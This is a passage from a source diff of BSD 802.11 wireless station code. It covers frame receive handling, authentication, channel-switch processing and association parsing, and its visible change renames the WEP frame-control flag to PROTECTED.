IF_LLADDR(ifp), ":", wh->i_addr1, ":"); vap->iv_stats.is_rx_wrongbss++; goto out; } IEEE80211_RSSI_LPF(ni->ni_avgrssi, rssi); ni->ni_noise = nf; if (HAS_SEQ(type) && !IEEE80211_IS_MULTICAST(wh->i_addr1)) { uint8_t tid = ieee80211_gettid(wh); if (IEEE80211_QOS_HAS_SEQ(wh) && TID_TO_WME_AC(tid) >= WME_AC_VI) ic->ic_wme.wme_hipri_traffic++; rxseq = le16toh(*(uint16_t *)wh->i_seq); if (! ieee80211_check_rxseq(ni, wh)) { /* duplicate, discard */ IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_INPUT, bssid, "duplicate", "seqno <%u,%u> fragno <%u,%u> tid %u", rxseq >> IEEE80211_SEQ_SEQ_SHIFT, ni->ni_rxseqs[tid] >> IEEE80211_SEQ_SEQ_SHIFT, rxseq & IEEE80211_SEQ_FRAG_MASK, ni->ni_rxseqs[tid] & IEEE80211_SEQ_FRAG_MASK, tid); vap->iv_stats.is_rx_dup++; IEEE80211_NODE_STAT(ni, rx_dup); goto out; } ni->ni_rxseqs[tid] = rxseq; } } switch (type) { case IEEE80211_FC0_TYPE_DATA: hdrspace = ieee80211_hdrspace(ic, wh); if (m->m_len < hdrspace && (m = m_pullup(m, hdrspace)) == NULL) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_ANY, ni->ni_macaddr, NULL, "data too short: expecting %u", hdrspace); vap->iv_stats.is_rx_tooshort++; goto out; /* XXX */ } /* * Handle A-MPDU re-ordering. If the frame is to be * processed directly then ieee80211_ampdu_reorder * will return 0; otherwise it has consumed the mbuf * and we should do nothing more with it. */ if ((m->m_flags & M_AMPDU) && (dir == IEEE80211_FC1_DIR_FROMDS || dir == IEEE80211_FC1_DIR_DSTODS) && ieee80211_ampdu_reorder(ni, m) != 0) { m = NULL; goto out; } resubmit_ampdu: if (dir == IEEE80211_FC1_DIR_FROMDS) { if ((ifp->if_flags & IFF_SIMPLEX) && isfromds_mcastecho(vap, wh)) { /* * In IEEE802.11 network, multicast * packets sent from "me" are broadcast * from the AP; silently discard for * SIMPLEX interface. */ IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, "data", "%s", "multicast echo"); vap->iv_stats.is_rx_mcastecho++; goto out; } if ((vap->iv_flags & IEEE80211_F_DWDS) && IEEE80211_IS_MULTICAST(wh->i_addr1)) { /* * DWDS sta's must drop 3-address mcast frames * as they will be sent separately as a 4-addr * frame. Accepting the 3-addr frame will * confuse the bridge into thinking the sending * sta is located at the end of WDS link. */ IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, "3-address data", "%s", "DWDS enabled"); vap->iv_stats.is_rx_mcastecho++; goto out; } } else if (dir == IEEE80211_FC1_DIR_DSTODS) { if ((vap->iv_flags & IEEE80211_F_DWDS) == 0) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, "4-address data", "%s", "DWDS not enabled"); vap->iv_stats.is_rx_wrongdir++; goto out; } if ((ifp->if_flags & IFF_SIMPLEX) && isdstods_mcastecho(vap, wh)) { /* * In IEEE802.11 network, multicast * packets sent from "me" are broadcast * from the AP; silently discard for * SIMPLEX interface. */ IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, "4-address data", "%s", "multicast echo"); vap->iv_stats.is_rx_mcastecho++; goto out; } } else { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, "data", "incorrect dir 0x%x", dir); vap->iv_stats.is_rx_wrongdir++; goto out; } /* * Handle privacy requirements. Note that we * must not be preempted from here until after * we (potentially) call ieee80211_crypto_demic; * otherwise we may violate assumptions in the * crypto cipher modules used to do delayed update * of replay sequence numbers. */ - if (wh->i_fc[1] & IEEE80211_FC1_WEP) { + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) { if ((vap->iv_flags & IEEE80211_F_PRIVACY) == 0) { /* * Discard encrypted frames when privacy is off. */ IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, "WEP", "%s", "PRIVACY off"); vap->iv_stats.is_rx_noprivacy++; IEEE80211_NODE_STAT(ni, rx_noprivacy); goto out; } key = ieee80211_crypto_decap(ni, m, hdrspace); if (key == NULL) { /* NB: stats+msgs handled in crypto_decap */ IEEE80211_NODE_STAT(ni, rx_wepfail); goto out; } wh = mtod(m, struct ieee80211_frame *); - wh->i_fc[1] &= ~IEEE80211_FC1_WEP; + wh->i_fc[1] &= ~IEEE80211_FC1_PROTECTED; } else { /* XXX M_WEP and IEEE80211_F_PRIVACY */ key = NULL; } /* * Save QoS bits for use below--before we strip the header. */ if (subtype == IEEE80211_FC0_SUBTYPE_QOS) { qos = (dir == IEEE80211_FC1_DIR_DSTODS) ? ((struct ieee80211_qosframe_addr4 *)wh)->i_qos[0] : ((struct ieee80211_qosframe *)wh)->i_qos[0]; } else qos = 0; /* * Next up, any fragmentation. */ if (!IEEE80211_IS_MULTICAST(wh->i_addr1)) { m = ieee80211_defrag(ni, m, hdrspace); if (m == NULL) { /* Fragment dropped or frame not complete yet */ goto out; } } wh = NULL; /* no longer valid, catch any uses */ /* * Next strip any MSDU crypto bits. */ if (key != NULL && !ieee80211_crypto_demic(vap, key, m, 0)) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_INPUT, ni->ni_macaddr, "data", "%s", "demic error"); vap->iv_stats.is_rx_demicfail++; IEEE80211_NODE_STAT(ni, rx_demicfail); goto out; } /* copy to listener after decrypt */ if (ieee80211_radiotap_active_vap(vap)) ieee80211_radiotap_rx(vap, m); need_tap = 0; /* * Finally, strip the 802.11 header. */ m = ieee80211_decap(vap, m, hdrspace); if (m == NULL) { /* XXX mask bit to check for both */ /* don't count Null data frames as errors */ if (subtype == IEEE80211_FC0_SUBTYPE_NODATA || subtype == IEEE80211_FC0_SUBTYPE_QOS_NULL) goto out; IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_INPUT, ni->ni_macaddr, "data", "%s", "decap error"); vap->iv_stats.is_rx_decap++; IEEE80211_NODE_STAT(ni, rx_decap); goto err; } eh = mtod(m, struct ether_header *); if (!ieee80211_node_is_authorized(ni)) { /* * Deny any non-PAE frames received prior to * authorization. For open/shared-key * authentication the port is mark authorized * after authentication completes. For 802.1x * the port is not marked authorized by the * authenticator until the handshake has completed. */ if (eh->ether_type != htons(ETHERTYPE_PAE)) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_INPUT, eh->ether_shost, "data", "unauthorized port: ether type 0x%x len %u", eh->ether_type, m->m_pkthdr.len); vap->iv_stats.is_rx_unauth++; IEEE80211_NODE_STAT(ni, rx_unauth); goto err; } } else { /* * When denying unencrypted frames, discard * any non-PAE frames received without encryption. */ if ((vap->iv_flags & IEEE80211_F_DROPUNENC) && (key == NULL && (m->m_flags & M_WEP) == 0) && eh->ether_type != htons(ETHERTYPE_PAE)) { /* * Drop unencrypted frames. */ vap->iv_stats.is_rx_unencrypted++; IEEE80211_NODE_STAT(ni, rx_unencrypted); goto out; } } /* XXX require HT? */ if (qos & IEEE80211_QOS_AMSDU) { m = ieee80211_decap_amsdu(ni, m); if (m == NULL) return IEEE80211_FC0_TYPE_DATA; } else { #ifdef IEEE80211_SUPPORT_SUPERG m = ieee80211_decap_fastframe(vap, ni, m); if (m == NULL) return IEEE80211_FC0_TYPE_DATA; #endif } ieee80211_deliver_data(vap, ni, m); return IEEE80211_FC0_TYPE_DATA; case IEEE80211_FC0_TYPE_MGT: vap->iv_stats.is_rx_mgmt++; IEEE80211_NODE_STAT(ni, rx_mgmt); if (dir != IEEE80211_FC1_DIR_NODS) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, "data", "incorrect dir 0x%x", dir); vap->iv_stats.is_rx_wrongdir++; goto err; } if (m->m_pkthdr.len < sizeof(struct ieee80211_frame)) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_ANY, ni->ni_macaddr, "mgt", "too short: len %u", m->m_pkthdr.len); vap->iv_stats.is_rx_tooshort++; goto out; } #ifdef IEEE80211_DEBUG if ((ieee80211_msg_debug(vap) && doprint(vap, subtype)) || ieee80211_msg_dumppkts(vap)) { if_printf(ifp, "received %s from %s rssi %d\n", ieee80211_mgt_subtype_name[subtype >> IEEE80211_FC0_SUBTYPE_SHIFT], ether_sprintf(wh->i_addr2), rssi); } #endif - if (wh->i_fc[1] & IEEE80211_FC1_WEP) { + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) { if (subtype != IEEE80211_FC0_SUBTYPE_AUTH) { /* * Only shared key auth frames with a challenge * should be encrypted, discard all others. */ IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, ieee80211_mgt_subtype_name[subtype >> IEEE80211_FC0_SUBTYPE_SHIFT], "%s", "WEP set but not permitted"); vap->iv_stats.is_rx_mgtdiscard++; /* XXX */ goto out; } if ((vap->iv_flags & IEEE80211_F_PRIVACY) == 0) { /* * Discard encrypted frames when privacy is off. */ IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, "mgt", "%s", "WEP set but PRIVACY off"); vap->iv_stats.is_rx_noprivacy++; goto out; } hdrspace = ieee80211_hdrspace(ic, wh); key = ieee80211_crypto_decap(ni, m, hdrspace); if (key == NULL) { /* NB: stats+msgs handled in crypto_decap */ goto out; } wh = mtod(m, struct ieee80211_frame *); - wh->i_fc[1] &= ~IEEE80211_FC1_WEP; + wh->i_fc[1] &= ~IEEE80211_FC1_PROTECTED; } vap->iv_recv_mgmt(ni, m, subtype, rssi, nf); goto out; case IEEE80211_FC0_TYPE_CTL: vap->iv_stats.is_rx_ctl++; IEEE80211_NODE_STAT(ni, rx_ctrl); vap->iv_recv_ctl(ni, m, subtype); goto out; default: IEEE80211_DISCARD(vap, IEEE80211_MSG_ANY, wh, NULL, "bad frame type 0x%x", type); /* should not come here */ break; } err: ifp->if_ierrors++; out: if (m != NULL) { if (need_tap && ieee80211_radiotap_active_vap(vap)) ieee80211_radiotap_rx(vap, m); m_freem(m); } return type; } static void sta_auth_open(struct ieee80211_node *ni, struct ieee80211_frame *wh, int rssi, int nf, uint16_t seq, uint16_t status) { struct ieee80211vap *vap = ni->ni_vap; if (ni->ni_authmode == IEEE80211_AUTH_SHARED) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_AUTH, ni->ni_macaddr, "open auth", "bad sta auth mode %u", ni->ni_authmode); vap->iv_stats.is_rx_bad_auth++; /* XXX */ return; } if (vap->iv_state != IEEE80211_S_AUTH || seq != IEEE80211_AUTH_OPEN_RESPONSE) { vap->iv_stats.is_rx_bad_auth++; return; } if (status != 0) { IEEE80211_NOTE(vap, IEEE80211_MSG_DEBUG | IEEE80211_MSG_AUTH, ni, "open auth failed (reason %d)", status); vap->iv_stats.is_rx_auth_fail++; vap->iv_stats.is_rx_authfail_code = status; ieee80211_new_state(vap, IEEE80211_S_SCAN, IEEE80211_SCAN_FAIL_STATUS); } else ieee80211_new_state(vap, IEEE80211_S_ASSOC, 0); } static void sta_auth_shared(struct ieee80211_node *ni, struct ieee80211_frame *wh, uint8_t *frm, uint8_t *efrm, int rssi, int nf, uint16_t seq, uint16_t status) { struct ieee80211vap *vap = ni->ni_vap; uint8_t *challenge; int estatus; /* * NB: this can happen as we allow pre-shared key * authentication to be enabled w/o wep being turned * on so that configuration of these can be done * in any order. It may be better to enforce the * ordering in which case this check would just be * for sanity/consistency. */ if ((vap->iv_flags & IEEE80211_F_PRIVACY) == 0) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_AUTH, ni->ni_macaddr, "shared key auth", "%s", " PRIVACY is disabled"); estatus = IEEE80211_STATUS_ALG; goto bad; } /* * Pre-shared key authentication is evil; accept * it only if explicitly configured (it is supported * mainly for compatibility with clients like OS X). */ if (ni->ni_authmode != IEEE80211_AUTH_AUTO && ni->ni_authmode != IEEE80211_AUTH_SHARED) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_AUTH, ni->ni_macaddr, "shared key auth", "bad sta auth mode %u", ni->ni_authmode); vap->iv_stats.is_rx_bad_auth++; /* XXX maybe a unique error? */ estatus = IEEE80211_STATUS_ALG; goto bad; } challenge = NULL; if (frm + 1 < efrm) { if ((frm[1] + 2) > (efrm - frm)) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_AUTH, ni->ni_macaddr, "shared key auth", "ie %d/%d too long", frm[0], (frm[1] + 2) - (efrm - frm)); vap->iv_stats.is_rx_bad_auth++; estatus = IEEE80211_STATUS_CHALLENGE; goto bad; } if (*frm == IEEE80211_ELEMID_CHALLENGE) challenge = frm; frm += frm[1] + 2; } switch (seq) { case IEEE80211_AUTH_SHARED_CHALLENGE: case IEEE80211_AUTH_SHARED_RESPONSE: if (challenge == NULL) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_AUTH, ni->ni_macaddr, "shared key auth", "%s", "no challenge"); vap->iv_stats.is_rx_bad_auth++; estatus = IEEE80211_STATUS_CHALLENGE; goto bad; } if (challenge[1] != IEEE80211_CHALLENGE_LEN) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_AUTH, ni->ni_macaddr, "shared key auth", "bad challenge len %d", challenge[1]); vap->iv_stats.is_rx_bad_auth++; estatus = IEEE80211_STATUS_CHALLENGE; goto bad; } default: break; } if (vap->iv_state != IEEE80211_S_AUTH) return; switch (seq) { case IEEE80211_AUTH_SHARED_PASS: if (ni->ni_challenge != NULL) { free(ni->ni_challenge, M_80211_NODE); ni->ni_challenge = NULL; } if (status != 0) { IEEE80211_NOTE_FRAME(vap, IEEE80211_MSG_DEBUG | IEEE80211_MSG_AUTH, wh, "shared key auth failed (reason %d)", status); vap->iv_stats.is_rx_auth_fail++; vap->iv_stats.is_rx_authfail_code = status; return; } ieee80211_new_state(vap, IEEE80211_S_ASSOC, 0); break; case IEEE80211_AUTH_SHARED_CHALLENGE: if (!ieee80211_alloc_challenge(ni)) return; /* XXX could optimize by passing recvd challenge */ memcpy(ni->ni_challenge, &challenge[2], challenge[1]); IEEE80211_SEND_MGMT(ni, IEEE80211_FC0_SUBTYPE_AUTH, seq + 1); break; default: IEEE80211_DISCARD(vap, IEEE80211_MSG_AUTH, wh, "shared key auth", "bad seq %d", seq); vap->iv_stats.is_rx_bad_auth++; return; } return; bad: /* * Kick the state machine. This short-circuits * using the mgt frame timeout to trigger the * state transition. */ if (vap->iv_state == IEEE80211_S_AUTH) ieee80211_new_state(vap, IEEE80211_S_SCAN, IEEE80211_SCAN_FAIL_STATUS); } int ieee80211_parse_wmeparams(struct ieee80211vap *vap, uint8_t *frm, const struct ieee80211_frame *wh) { #define MS(_v, _f) (((_v) & _f) >> _f##_S) struct ieee80211_wme_state *wme = &vap->iv_ic->ic_wme; u_int len = frm[1], qosinfo; int i; if (len < sizeof(struct ieee80211_wme_param)-2) { IEEE80211_DISCARD_IE(vap, IEEE80211_MSG_ELEMID | IEEE80211_MSG_WME, wh, "WME", "too short, len %u", len); return -1; } qosinfo = frm[__offsetof(struct ieee80211_wme_param, param_qosInfo)]; qosinfo &= WME_QOSINFO_COUNT; /* XXX do proper check for wraparound */ if (qosinfo == wme->wme_wmeChanParams.cap_info) return 0; frm += __offsetof(struct ieee80211_wme_param, params_acParams); for (i = 0; i < WME_NUM_AC; i++) { struct wmeParams *wmep = &wme->wme_wmeChanParams.cap_wmeParams[i]; /* NB: ACI not used */ wmep->wmep_acm = MS(frm[0], WME_PARAM_ACM); wmep->wmep_aifsn = MS(frm[0], WME_PARAM_AIFSN); wmep->wmep_logcwmin = MS(frm[1], WME_PARAM_LOGCWMIN); wmep->wmep_logcwmax = MS(frm[1], WME_PARAM_LOGCWMAX); wmep->wmep_txopLimit = LE_READ_2(frm+2); frm += 4; } wme->wme_wmeChanParams.cap_info = qosinfo; return 1; #undef MS } /* * Process 11h Channel Switch Announcement (CSA) ie. If this * is the first CSA then initiate the switch. Otherwise we * track state and trigger completion and/or cancel of the switch. * XXX should be public for IBSS use */ static void ieee80211_parse_csaparams(struct ieee80211vap *vap, uint8_t *frm, const struct ieee80211_frame *wh) { struct ieee80211com *ic = vap->iv_ic; const struct ieee80211_csa_ie *csa = (const struct ieee80211_csa_ie *) frm; KASSERT(vap->iv_state >= IEEE80211_S_RUN, ("state %s", ieee80211_state_name[vap->iv_state])); if (csa->csa_mode > 1) { IEEE80211_DISCARD_IE(vap, IEEE80211_MSG_ELEMID | IEEE80211_MSG_DOTH, wh, "CSA", "invalid mode %u", csa->csa_mode); return; } IEEE80211_LOCK(ic); if ((ic->ic_flags & IEEE80211_F_CSAPENDING) == 0) { /* * Convert the channel number to a channel reference. We * try first to preserve turbo attribute of the current * channel then fallback. Note this will not work if the * CSA specifies a channel that requires a band switch (e.g. * 11a => 11g). This is intentional as 11h is defined only * for 5GHz/11a and because the switch does not involve a * reassociation, protocol state (capabilities, negotated * rates, etc) may/will be wrong. */ struct ieee80211_channel *c = ieee80211_find_channel_byieee(ic, csa->csa_newchan, (ic->ic_bsschan->ic_flags & IEEE80211_CHAN_ALLTURBO)); if (c == NULL) { c = ieee80211_find_channel_byieee(ic, csa->csa_newchan, (ic->ic_bsschan->ic_flags & IEEE80211_CHAN_ALL)); if (c == NULL) { IEEE80211_DISCARD_IE(vap, IEEE80211_MSG_ELEMID | IEEE80211_MSG_DOTH, wh, "CSA", "invalid channel %u", csa->csa_newchan); goto done; } } #if IEEE80211_CSA_COUNT_MIN > 0 if (csa->csa_count < IEEE80211_CSA_COUNT_MIN) { /* * Require at least IEEE80211_CSA_COUNT_MIN count to * reduce the risk of being redirected by a fabricated * CSA. If a valid CSA is dropped we'll still get a * beacon miss when the AP leaves the channel so we'll * eventually follow to the new channel. * * NOTE: this violates the 11h spec that states that * count may be any value and if 0 then a switch * should happen asap. */ IEEE80211_DISCARD_IE(vap, IEEE80211_MSG_ELEMID | IEEE80211_MSG_DOTH, wh, "CSA", "count %u too small, must be >= %u", csa->csa_count, IEEE80211_CSA_COUNT_MIN); goto done; } #endif ieee80211_csa_startswitch(ic, c, csa->csa_mode, csa->csa_count); } else { /* * Validate this ie against the initial CSA. We require * mode and channel not change and the count must be * monotonically decreasing. This may be pointless and * canceling the switch as a result may be too paranoid but * in the worst case if we drop out of CSA because of this * and the AP does move then we'll just end up taking a * beacon miss and scan to find the AP. * * XXX may want <= on count as we also process ProbeResp * frames and those may come in w/ the same count as the * previous beacon; but doing so leaves us open to a stuck * count until we add a dead-man timer */ if (!(csa->csa_count < ic->ic_csa_count && csa->csa_mode == ic->ic_csa_mode && csa->csa_newchan == ieee80211_chan2ieee(ic, ic->ic_csa_newchan))) { IEEE80211_NOTE_FRAME(vap, IEEE80211_MSG_DOTH, wh, "CSA ie mismatch, initial ie <%d,%d,%d>, " "this ie <%d,%d,%d>", ic->ic_csa_mode, ic->ic_csa_newchan, ic->ic_csa_count, csa->csa_mode, csa->csa_newchan, csa->csa_count); ieee80211_csa_cancelswitch(ic); } else { if (csa->csa_count <= 1) ieee80211_csa_completeswitch(ic); else ic->ic_csa_count = csa->csa_count; } } done: IEEE80211_UNLOCK(ic); } /* * Return non-zero if a background scan may be continued: * o bg scan is active * o no channel switch is pending * o there has not been any traffic recently * * Note we do not check if there is an administrative enable; * this is only done to start the scan. We assume that any * change in state will be accompanied by a request to cancel * active scans which will otherwise cause this test to fail. */ static __inline int contbgscan(struct ieee80211vap *vap) { struct ieee80211com *ic = vap->iv_ic; return ((ic->ic_flags_ext & IEEE80211_FEXT_BGSCAN) && (ic->ic_flags & IEEE80211_F_CSAPENDING) == 0 && vap->iv_state == IEEE80211_S_RUN && /* XXX? */ time_after(ticks, ic->ic_lastdata + vap->iv_bgscanidle)); } /* * Return non-zero if a backgrond scan may be started: * o bg scanning is administratively enabled * o no channel switch is pending * o we are not boosted on a dynamic turbo channel * o there has not been a scan recently * o there has not been any traffic recently */ static __inline int startbgscan(struct ieee80211vap *vap) { struct ieee80211com *ic = vap->iv_ic; return ((vap->iv_flags & IEEE80211_F_BGSCAN) && (ic->ic_flags & IEEE80211_F_CSAPENDING) == 0 && #ifdef IEEE80211_SUPPORT_SUPERG !IEEE80211_IS_CHAN_DTURBO(ic->ic_curchan) && #endif time_after(ticks, ic->ic_lastscan + vap->iv_bgscanintvl) && time_after(ticks, ic->ic_lastdata + vap->iv_bgscanidle)); } static void sta_recv_mgmt(struct ieee80211_node *ni, struct mbuf *m0, int subtype, int rssi, int nf) { #define ISPROBE(_st) ((_st) == IEEE80211_FC0_SUBTYPE_PROBE_RESP) #define ISREASSOC(_st) ((_st) == IEEE80211_FC0_SUBTYPE_REASSOC_RESP) struct ieee80211vap *vap = ni->ni_vap; struct ieee80211com *ic = ni->ni_ic; struct ieee80211_frame *wh; uint8_t *frm, *efrm; uint8_t *rates, *xrates, *wme, *htcap, *htinfo; uint8_t rate; int ht_state_change = 0; wh = mtod(m0, struct ieee80211_frame *); frm = (uint8_t *)&wh[1]; efrm = mtod(m0, uint8_t *) + m0->m_len; switch (subtype) { case IEEE80211_FC0_SUBTYPE_PROBE_RESP: case IEEE80211_FC0_SUBTYPE_BEACON: { struct ieee80211_scanparams scan; /* * We process beacon/probe response frames: * o when scanning, or * o station mode when associated (to collect state * updates such as 802.11g slot time) * Frames otherwise received are discarded. */ if (!((ic->ic_flags & IEEE80211_F_SCAN) || ni->ni_associd)) { vap->iv_stats.is_rx_mgtdiscard++; return; } /* XXX probe response in sta mode when !scanning? */ if (ieee80211_parse_beacon(ni, m0, &scan) != 0) { if (! (ic->ic_flags & IEEE80211_F_SCAN)) vap->iv_stats.is_beacon_bad++; return; } /* * Count frame now that we know it's to be processed. */ if (subtype == IEEE80211_FC0_SUBTYPE_BEACON) { vap->iv_stats.is_rx_beacon++; /* XXX remove */ IEEE80211_NODE_STAT(ni, rx_beacons); } else IEEE80211_NODE_STAT(ni, rx_proberesp); /* * When operating in station mode, check for state updates. * Be careful to ignore beacons received while doing a * background scan. We consider only 11g/WMM stuff right now. */ if (ni->ni_associd != 0 && ((ic->ic_flags & IEEE80211_F_SCAN) == 0 || IEEE80211_ADDR_EQ(wh->i_addr2, ni->ni_bssid))) { /* record tsf of last beacon */ memcpy(ni->ni_tstamp.data, scan.tstamp, sizeof(ni->ni_tstamp)); /* count beacon frame for s/w bmiss handling */ vap->iv_swbmiss_count++; vap->iv_bmiss_count = 0; if (ni->ni_erp != scan.erp) { IEEE80211_NOTE_MAC(vap, IEEE80211_MSG_ASSOC, wh->i_addr2, "erp change: was 0x%x, now 0x%x", ni->ni_erp, scan.erp); if (IEEE80211_IS_CHAN_ANYG(ic->ic_curchan) && (ni->ni_erp & IEEE80211_ERP_USE_PROTECTION)) ic->ic_flags |= IEEE80211_F_USEPROT; else ic->ic_flags &= ~IEEE80211_F_USEPROT; ni->ni_erp = scan.erp; /* XXX statistic */ /* XXX driver notification */ } if ((ni->ni_capinfo ^ scan.capinfo) & IEEE80211_CAPINFO_SHORT_SLOTTIME) { IEEE80211_NOTE_MAC(vap, IEEE80211_MSG_ASSOC, wh->i_addr2, "capabilities change: was 0x%x, now 0x%x", ni->ni_capinfo, scan.capinfo); /* * NB: we assume short preamble doesn't * change dynamically */ ieee80211_set_shortslottime(ic, IEEE80211_IS_CHAN_A(ic->ic_bsschan) || (scan.capinfo & IEEE80211_CAPINFO_SHORT_SLOTTIME)); ni->ni_capinfo = (ni->ni_capinfo &~ IEEE80211_CAPINFO_SHORT_SLOTTIME) | (scan.capinfo & IEEE80211_CAPINFO_SHORT_SLOTTIME); /* XXX statistic */ } if (scan.wme != NULL && (ni->ni_flags & IEEE80211_NODE_QOS) && ieee80211_parse_wmeparams(vap, scan.wme, wh) > 0) ieee80211_wme_updateparams(vap); #ifdef IEEE80211_SUPPORT_SUPERG if (scan.ath != NULL) ieee80211_parse_athparams(ni, scan.ath, wh); #endif if (scan.htcap != NULL && scan.htinfo != NULL && (vap->iv_flags_ht & IEEE80211_FHT_HT)) { /* XXX state changes? */ if (ieee80211_ht_updateparams(ni, scan.htcap, scan.htinfo)) ht_state_change = 1; } if (scan.quiet) ic->ic_set_quiet(ni, scan.quiet); if (scan.tim != NULL) { struct ieee80211_tim_ie *tim = (struct ieee80211_tim_ie *) scan.tim; #if 0 int aid = IEEE80211_AID(ni->ni_associd); int ix = aid / NBBY; int min = tim->tim_bitctl &~ 1; int max = tim->tim_len + min - 4; if ((tim->tim_bitctl&1) || (min <= ix && ix <= max && isset(tim->tim_bitmap - min, aid))) { /* * XXX Do not let bg scan kick off * we are expecting data. */ ic->ic_lastdata = ticks; vap->iv_sta_ps(vap, 0); } #endif ni->ni_dtim_count = tim->tim_count; ni->ni_dtim_period = tim->tim_period; } if (scan.csa != NULL && (vap->iv_flags & IEEE80211_F_DOTH)) ieee80211_parse_csaparams(vap, scan.csa, wh); else if (ic->ic_flags & IEEE80211_F_CSAPENDING) { /* * No CSA ie or 11h disabled, but a channel * switch is pending; drop out so we aren't * stuck in CSA state. If the AP really is * moving we'll get a beacon miss and scan. */ IEEE80211_LOCK(ic); ieee80211_csa_cancelswitch(ic); IEEE80211_UNLOCK(ic); } /* * If scanning, pass the info to the scan module. * Otherwise, check if it's the right time to do * a background scan. Background scanning must * be enabled and we must not be operating in the * turbo phase of dynamic turbo mode. Then, * it's been a while since the last background * scan and if no data frames have come through * recently, kick off a scan. Note that this * is the mechanism by which a background scan * is started _and_ continued each time we * return on-channel to receive a beacon from * our ap. */ if (ic->ic_flags & IEEE80211_F_SCAN) { ieee80211_add_scan(vap, &scan, wh, subtype, rssi, nf); } else if (contbgscan(vap)) { ieee80211_bg_scan(vap, 0); } else if (startbgscan(vap)) { vap->iv_stats.is_scan_bg++; #if 0 /* wakeup if we are sleeing */ ieee80211_set_pwrsave(vap, 0); #endif ieee80211_bg_scan(vap, 0); } /* * If we've had a channel width change (eg HT20<->HT40) * then schedule a delayed driver notification. */ if (ht_state_change) ieee80211_update_chw(ic); return; } /* * If scanning, just pass information to the scan module. */ if (ic->ic_flags & IEEE80211_F_SCAN) { if (ic->ic_flags_ext & IEEE80211_FEXT_PROBECHAN) { /* * Actively scanning a channel marked passive; * send a probe request now that we know there * is 802.11 traffic present. * * XXX check if the beacon we recv'd gives * us what we need and suppress the probe req */ ieee80211_probe_curchan(vap, 1); ic->ic_flags_ext &= ~IEEE80211_FEXT_PROBECHAN; } ieee80211_add_scan(vap, &scan, wh, subtype, rssi, nf); return; } break; } case IEEE80211_FC0_SUBTYPE_AUTH: { uint16_t algo, seq, status; /* * auth frame format * [2] algorithm * [2] sequence * [2] status * [tlv*] challenge */ IEEE80211_VERIFY_LENGTH(efrm - frm, 6, return); algo = le16toh(*(uint16_t *)frm); seq = le16toh(*(uint16_t *)(frm + 2)); status = le16toh(*(uint16_t *)(frm + 4)); IEEE80211_NOTE_MAC(vap, IEEE80211_MSG_AUTH, wh->i_addr2, "recv auth frame with algorithm %d seq %d", algo, seq); if (vap->iv_flags & IEEE80211_F_COUNTERM) { IEEE80211_DISCARD(vap, IEEE80211_MSG_AUTH | IEEE80211_MSG_CRYPTO, wh, "auth", "%s", "TKIP countermeasures enabled"); vap->iv_stats.is_rx_auth_countermeasures++; if (vap->iv_opmode == IEEE80211_M_HOSTAP) { ieee80211_send_error(ni, wh->i_addr2, IEEE80211_FC0_SUBTYPE_AUTH, IEEE80211_REASON_MIC_FAILURE); } return; } if (algo == IEEE80211_AUTH_ALG_SHARED) sta_auth_shared(ni, wh, frm + 6, efrm, rssi, nf, seq, status); else if (algo == IEEE80211_AUTH_ALG_OPEN) sta_auth_open(ni, wh, rssi, nf, seq, status); else { IEEE80211_DISCARD(vap, IEEE80211_MSG_ANY, wh, "auth", "unsupported alg %d", algo); vap->iv_stats.is_rx_auth_unsupported++; return; } break; } case IEEE80211_FC0_SUBTYPE_ASSOC_RESP: case IEEE80211_FC0_SUBTYPE_REASSOC_RESP: { uint16_t capinfo, associd; uint16_t status; if (vap->iv_state != IEEE80211_S_ASSOC) { vap->iv_stats.is_rx_mgtdiscard++; return; } /* * asresp frame format * [2] capability information * [2] status * [2] association ID * [tlv] supported rates * [tlv] extended supported rates * [tlv] WME * [tlv] HT capabilities * [tlv] HT info */ IEEE80211_VERIFY_LENGTH(efrm - frm, 6, return); ni = vap->iv_bss; capinfo = le16toh(*(uint16_t *)frm); frm += 2; status = le16toh(*(uint16_t *)frm); frm += 2; if (status != 0) { IEEE80211_NOTE_MAC(vap, IEEE80211_MSG_ASSOC, wh->i_addr2, "%sassoc failed (reason %d)", ISREASSOC(subtype) ? "re" : "", status); vap->iv_stats.is_rx_auth_fail++; /* XXX */ return; } associd = le16toh(*(uint16_t *)frm); frm += 2; rates = xrates = wme = htcap = htinfo = NULL; while (efrm - frm > 1) { IEEE80211_VERIFY_LENGTH(efrm - frm, frm[1] + 2, return); switch (*frm) { case IEEE80211_ELEMID_RATES: rates = frm; break; case IEEE80211_ELEMID_XRATES: xrates = frm; break; case IEEE80211_ELEMID_HTCAP: htcap = frm; break; case IEEE80211_ELEMID_HTINFO: htinfo = frm; break; case IEEE80211_ELEMID_VENDOR: if (iswmeoui(frm)) wme = frm; else if (vap->iv_flags_ht & IEEE80211_FHT_HTCOMPAT) { /* * Accept pre-draft HT ie's if the * standard ones have not been seen. */ if (ishtcapoui(frm)) { if (htcap == NULL) htcap = frm; } else if (ishtinfooui(frm)) { if (htinfo == NULL) htinfo = frm; } } /* XXX Atheros OUI support */ break; } frm += frm[1] + 2; } IEEE80211_VERIFY_ELEMENT(rates, IEEE80211_RATE_MAXSIZE, return); if (xrates != NULL) IEEE80211_VERIFY_ELEMENT(xrates, IEEE80211_RATE_MAXSIZE - rates[1], return); rate = ieee80211_setup_rates(ni, rates, xrates, 